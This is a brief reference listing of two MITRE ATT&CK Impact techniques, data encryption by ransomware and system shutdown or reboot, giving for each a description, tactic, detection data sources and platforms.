Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre